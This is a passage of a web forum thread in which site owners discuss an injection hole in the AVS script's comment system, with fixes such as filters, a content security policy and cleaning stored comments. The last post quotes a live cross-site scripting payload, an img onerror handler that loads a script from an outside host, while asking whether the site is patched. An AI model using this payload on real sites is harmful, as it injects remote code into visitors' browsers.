Jump to content


Photo
* * * - - 2 votes

Attention hackers and comments!!!!!


  • Please log in to reply
25 replies to this topic

#21 Damien

Damien

    Junior Member

  • Members
  • PipPipPip
  • 78 posts

Posted 24 July 2016 - 01:47 AM

avs admin imagine that will upgrade, for other people who have no solution.

 

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.


Edited by Damien, 24 July 2016 - 01:53 AM.


#22 apple82

apple82

    Member

  • Members
  • PipPipPipPip
  • 294 posts
  • LocationSpain

Posted 24 July 2016 - 06:25 AM

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.

 

Yes, send email suport avs.



#23 Damien

Damien

    Junior Member

  • Members
  • PipPipPip
  • 78 posts

Posted 29 July 2016 - 07:08 AM

Yes, send email suport avs.

 

We don't have this problem, we've solved it with a filter. Also anyone using niginx can set a content security policy anyway, his .js script wont work then. https://content-security-policy.com/

 

My other point is no-one should need ask for help with this, it's a hole in the comments system that should be patched and updated, it's letting him run a .js file it's an exploit imo.


Edited by Damien, 29 July 2016 - 07:10 AM.


#24 theone

theone

    Senior Member

  • Members
  • PipPipPipPip
  • 368 posts

Posted 22 November 2016 - 01:39 AM

I'm assuming this was patched in AVS 4 but if anyone has not fixed this I have a mod that will detect the malicious code and prevent the comment from posting, immediately ban the user, and provide you with a range of information about the malicious person including computer / browser specs, ip, geo location, etc.



#25 Yikmings

Yikmings

    Junior Member

  • Members
  • PipPip
  • 22 posts

Posted 24 November 2016 - 10:47 AM

I fix it by disable and clean all comments in sql.



#26 brianatthebeach

brianatthebeach

    Member

  • Members
  • PipPipPip
  • 86 posts

Posted Yesterday, 05:53 AM

Anyone know if this is fixed?  I am currently on avs 3.3.  When I put in comment 

<img src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';><img src = etc etc
mg src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';>mg src = etc etc

left angle bracket and i <i is removed from from each occurrence in the comment

 

Does this indicate I have a fix applied with 3.3?

 

Thanks,

Brian